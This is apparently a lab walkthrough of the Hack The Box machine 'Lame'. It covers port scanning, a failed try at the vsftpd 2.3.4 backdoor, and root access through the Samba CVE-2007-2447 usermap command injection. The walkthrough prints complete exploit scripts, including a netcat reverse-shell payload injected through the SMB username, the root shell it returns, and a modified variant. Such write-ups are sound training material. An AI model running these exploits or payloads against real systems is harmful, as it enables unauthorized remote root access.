Notes
| Name | Explore |
|---|---|
| OS | Linux |
| RELEASE DATE | 14 Mar 2017 |
| DIFFICULTY | Easy |
IP:10.10.10.3
Port Scan
I started with a nmap scan on this machine to enumerate open ports.
nmap -p- --min-rate 1000 10.10.10.3 -oN allPorts.nmap -Pn -v
-p- – Scan all ports
--min-rate 1000 – Speed up the scan
-oN – Save the output to a file
-Pn – Skip host discovery
-v – Verbose (show more output as the scan is running)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
With a list of open ports, I then did a deeper nmap scan to enumerate service versions and run safe scripts
nmap -p 21,22,139,445,3632 -oN scriptScan.nmap -sVC 10.10.10.3 -Pn
-p – Scan port specified
-oN – Save the output to a file
-sVC – Determine service version & run default NSE scripts
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.5
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2022-09-14T17:28:46-04:00
|_clock-skew: mean: 2h00m14s, deviation: 2h49m47s, median: 10s
21/TCP FTP
Anonymous login is enabled but there is nothing.
┌─[✗]─[zon@pwn]─[~/htb/lame]
└──╼ $ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:zon): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
nmap determined that this FTP server is running vsFTPd 2.3.4. It’s always worth searching for a CVE when a version is found. I used searchsploit and found a backdoor command execution vulnerability!
┌─[zon@pwn]─[~/htb/lame]
└──╼ $searchsploit vsFTPd 2.3.4
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
---------------------------------------------------------------------------------------------------------------- ---------------------------------
searchsploit has a -m switch that will “mirror” aka copies an exploit to the current working directory.
┌─[zon@pwn]─[~/htb/lame]
└──╼ $searchsploit -m unix/remote/49757.py
Exploit: vsftpd 2.3.4 - Backdoor Command Execution
URL: https://www.exploit-db.com/exploits/49757
Path: /opt/exploitdb/exploits/unix/remote/49757.py
File Type: Python script, ASCII text executable
Copied to: /home/zon/htb/lame/49757.py
Before running an exploit I like to look at the exploit to make sure it is “safe” and there is no backdoor or unintended things happening. It looks pretty good to me. It will connect to the server using the username nergal:) and then spawn a shell.
┌─[zon@pwn]─[~/htb/lame]
└──╼ $cat 49757.py
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
#!/usr/bin/python3
from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit
def handler(signal_received, frame):
# Handle any cleanup here
print(' [+]Exiting...')
exit(0)
signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line
user="USER nergal:)"
password="PASS pass"
tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
After running the exploit it did not work!
┌─[zon@pwn]─[~/htb/lame]
└──╼ $python3 49757.py 10.10.10.3
id
ls
To double check, I tried the exploit manually and it still did not work
┌─[zon@pwn]─[~/htb/lame]
└──╼ $ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:zon): nergal:)
331 Please specify the password.
Password:
500 OOPS: priv_sock_get_result
Login failed.
421 Service not available, remote server has closed connection
22/TCP SSH
SSH usually has a low attack surface. I googled OpenSSH 4.7p1 to see if there were any public exploits but I could not find one, let’s move on
139/TCP & 445/TCP SMB
nmap determined that smbd 3.0.20-Debian is running on this server. I googled smbd 3.0.20-Debian and the first link was an exploit-db entry to an RCE exploit dubbed CVE: 2007-2447. This exploit is in metasploit but I like to stay away from metasploit and understand how the exploit work (below I will do an in-depth analysis of this exploit). I did another google search for CVE-2007-2447 and the first link was to this repo.
usermap_script.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
import sys
from smb.SMBConnection import SMBConnection
def exploit(rhost, rport, lhost, lport):
payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
username = "/=`nohup " + payload + "`"
conn = SMBConnection(username, "", "", "")
try:
conn.connect(rhost, int(rport), timeout=1)
except:
print("[+] Payload was sent - check netcat !")
if __name__ == '__main__':
print("[*] CVE-2007-2447 - Samba usermap script")
if len(sys.argv) != 5:
print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
else:
print("[+] Connecting !")
rhost = sys.argv[1]
rport = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]
exploit(rhost, rport, lhost, lport)
To run this exploit I will set up a nc listener nc -lvnp 9001 and then run the exploit.
┌─[zon@pwn]─[~/htb/lame]
└──╼ $python3 usermap_script.py 10.10.10.3 445 10.10.14.5 9001
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
Back on netcat I get a shell as root!
┌─[zon@pwn]─[~/htb/lame]
└──╼ $nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.3] 45130
whoami
root
CVE-2007-2447 - Samba usermap script
Samba 3.0.0 - 3.0.25rc3 are vulnerable to CVE-2007-2447 which allows a remote attacker to execute commands via the username parameter.
Two files that are important to this exploit smbrun.c and map_username.c
map_username.c
In the code below we can see that command is set to cmd and user. cmd will be set to a script defined in smb.conf, user will be set to whatever we supply. Putting it all together a normal request will look like /etc/samba/script/usermap.sh “Zonifer”. That string is then sent to smbrun
if ( *cmd ) {
char **qlines;
pstring command;
int numlines, ret, fd;
----> pstr_sprintf( command, "%s \"%s\"", cmd, user );
DEBUG(10,("Running [%s]\n", command));
----> ret = smbrun(command, &fd);
DEBUGADD(10,("returned [%d]\n", ret));
if ( ret != 0 ) {
if (fd != -1)
close(fd);
return False;
}
smbrun.c
Below is the smbrun function that will execute /bin/sh sh -c /etc/samba/script/usermap.sh "Zonifer". Because there is no input sanitization we can inject into execl and execute any command we want! The payload will look like /=`nohup{payload}`.
```c
#ifndef __INSURE__
/* close all other file descriptors, leaving only 0, 1 and 2. 0 and
2 point to /dev/null from the startup code */
{
int fd;
for (fd=3;fd<256;fd++) close(fd);
}
#endif
execl("/bin/sh","sh","-c",cmd,NULL);
/* not reached */
exit(82);
return 1;
}
Doing a quick modification to the exploit code I can write a file to /tmp
#!/usr/bin/python3
import sys
from smb.SMBConnection import SMBConnection
def exploit(rhost, rport):
payload = 'touch /tmp/zon.txt'
username = "/=`nohup " + payload + "`"
conn = SMBConnection(username, "", "", "")
try:
conn.connect(rhost, int(rport), timeout=1)
except:
print("[+] Payload was sent")
if __name__ == '__main__':
print("[*] CVE-2007-2447 - Samba usermap script")
print("[+] Connecting !")
rhost = sys.argv[1]
rport = sys.argv[2]
exploit(rhost, rport)
Contents of /tmp before
ls
5573.jsvc_up
hago
vgauthsvclog.txt.0
vmware-root
Run exploit
┌─[zon@pwn]─[~/htb/lame]
└──╼ $python3 mod.py 10.10.10.3 445
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
View /tmp
ls
5573.jsvc_up
hago
vgauthsvclog.txt.0
vmware-root
zon.txt